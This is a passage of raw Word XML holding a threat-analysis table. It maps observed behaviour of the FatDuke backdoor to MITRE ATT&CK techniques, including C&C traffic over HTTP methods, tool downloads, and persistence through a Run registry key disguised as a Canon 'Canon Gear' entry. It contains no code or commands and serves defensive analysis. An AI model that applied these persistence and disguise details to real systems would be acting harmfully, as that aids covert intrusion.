            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A24CD0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The network communication is relatively simple. It can use the GET, POST and PUT HTTP methods to contact </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5081ED56" w14:textId="77777777" w:rsidR="00CC1C25" w:rsidRPr="00A164AD" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24CD0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>the hardcoded C&amp;C server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="00743E00" w14:paraId="3CBF98EA" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA2DB70" w14:textId="717ECE02" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008B110A" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC90B77" w14:textId="77777777" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008B110A" w:rsidP="00E530D0">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71C99B69" w14:textId="77777777" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008B110A" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5BFA69" w14:textId="6AB2E4B6" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008B110A" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09A2844F" w14:textId="77777777" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008B110A" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABA8F56" w14:textId="77777777" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008B110A" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22199868" w14:textId="60538BC3" w:rsidR="008B110A" w:rsidRPr="00F35DE8" w:rsidRDefault="008E328C" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21811D5D" w14:textId="77777777" w:rsidR="00B1179F" w:rsidRDefault="008B110A" w:rsidP="00B1179F">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00B1179F">
              <w:t xml:space="preserve">During our investigation, we were not able to find a dropper for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B1179F">
              <w:t>FatDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B1179F">
              <w:t xml:space="preserve">. We believe the operators simply </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF8902B" w14:textId="715040CA" w:rsidR="008B110A" w:rsidRPr="0096445D" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:r>
              <w:t>install the backdoor and establish persistence using the standard commands of an earlier stage backdoor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="00743E00" w14:paraId="59C665E6" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38C42373" w14:textId="1C2D5D9A" w:rsidR="00B1179F" w:rsidRPr="00743E00" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5790C160" w14:textId="36201F79" w:rsidR="00B1179F" w:rsidRPr="00743E00" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67576E78" w14:textId="096430DD" w:rsidR="00B1179F" w:rsidRPr="00743E00" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2035CF55" w14:textId="5F68030C" w:rsidR="00B1179F" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5FAC45" w14:textId="77777777" w:rsidR="00B1179F" w:rsidRPr="00743E00" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3060BC58" w14:textId="6EF18761" w:rsidR="00B1179F" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A263751" w14:textId="426BA234" w:rsidR="00B1179F" w:rsidRPr="00743E00" w:rsidRDefault="008E328C" w:rsidP="00B1179F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E328C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B43486" w14:textId="77777777" w:rsidR="00574B2A" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:r>
              <w:t xml:space="preserve">[1] We also noted that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>FatDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> generally replaced the second-stage binary, reusing the persistence </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D6F055C" w14:textId="43E6EBFC" w:rsidR="00B1179F" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:r>
              <w:t xml:space="preserve">mechanism already in place </w:t>
            </w:r>
            <w:r w:rsidR="00B1179F">
              <w:t>[1] The persistence we have seen is very standard. They use the registry key HKLM\SOFTWARE\Microsoft\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="572D9B5F" w14:textId="77777777" w:rsidR="00B1179F" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:r>
              <w:t xml:space="preserve">Windows\CurrentVersion\Run and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>creatd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> a new value named Canon Gear and value C:\Program </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7724CC81" w14:textId="0BAE7C95" w:rsidR="00B1179F" w:rsidRPr="0096445D" w:rsidRDefault="00B1179F" w:rsidP="00B1179F">
            <w:r>
              <w:t xml:space="preserve">Files\Canon\Network </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ScanGear</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>\Canocpc.exe. This launches the backdoor each time a user logs in.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00574B2A" w:rsidRPr="00743E00" w14:paraId="089443E1" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4FA9D9" w14:textId="4B5F9DB1" w:rsidR="00574B2A" w:rsidRPr="00DF3093" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5433D341" w14:textId="70D7E2C0" w:rsidR="00574B2A" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">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633C5441" w14:textId="2522C581" w:rsidR="00574B2A" w:rsidRPr="00DF3093" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C79342E" w14:textId="0F1F5A58" w:rsidR="00574B2A" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D39822" w14:textId="77777777" w:rsidR="00574B2A" w:rsidRPr="00743E00" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00803EE0" w14:textId="098743CB" w:rsidR="00574B2A" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52F8C7DA" w14:textId="0E91C6C3" w:rsidR="00574B2A" w:rsidRPr="00743E00" w:rsidRDefault="00477434" w:rsidP="00574B2A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6705C49D" w14:textId="77777777" w:rsidR="00574B2A" w:rsidRDefault="00574B2A" w:rsidP="00574B2A">
            <w:r>
              <w:t>[1] Example Fig 30 cycle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44130B2B" w14:textId="0451AB48" w:rsidR="00574B2A" w:rsidRDefault="00BA18C2" w:rsidP="00574B2A">
            <w:r>
              <w:t>Get HTML page (and extra image URL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D17E40B" w14:textId="6354B790" w:rsidR="00574B2A" w:rsidRDefault="00574B2A" w:rsidP="00574B2A"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA18C2" w:rsidRPr="00743E00" w14:paraId="4B31246A" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDF5708" w14:textId="268477F1" w:rsidR="00BA18C2" w:rsidRDefault="0026410D" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F1A81C1" w14:textId="4902B62F" w:rsidR="00BA18C2" w:rsidRPr="005B3D45" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">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55" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F0BDA0" w14:textId="08141221" w:rsidR="00BA18C2" w:rsidRPr="005B3D45" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA78E59" w14:textId="786C0F62" w:rsidR="00BA18C2" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="030CC367" w14:textId="77777777" w:rsidR="00BA18C2" w:rsidRPr="00743E00" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB0FC72" w14:textId="241D9068" w:rsidR="00BA18C2" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD15377" w14:textId="77839CB2" w:rsidR="00BA18C2" w:rsidRPr="00743E00" w:rsidRDefault="00477434" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C7BF9F6" w14:textId="4F2DCC58" w:rsidR="00BA18C2" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:r>
              <w:t>[1] Download PNG file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA18C2" w:rsidRPr="00743E00" w14:paraId="0D16EC04" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03CD625C" w14:textId="10A8D7D1" w:rsidR="00BA18C2" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79431AF1" w14:textId="62E6FC38" w:rsidR="00BA18C2" w:rsidRPr="005B3D45" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6D803F" w14:textId="5266E382" w:rsidR="00BA18C2" w:rsidRPr="00943C83" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
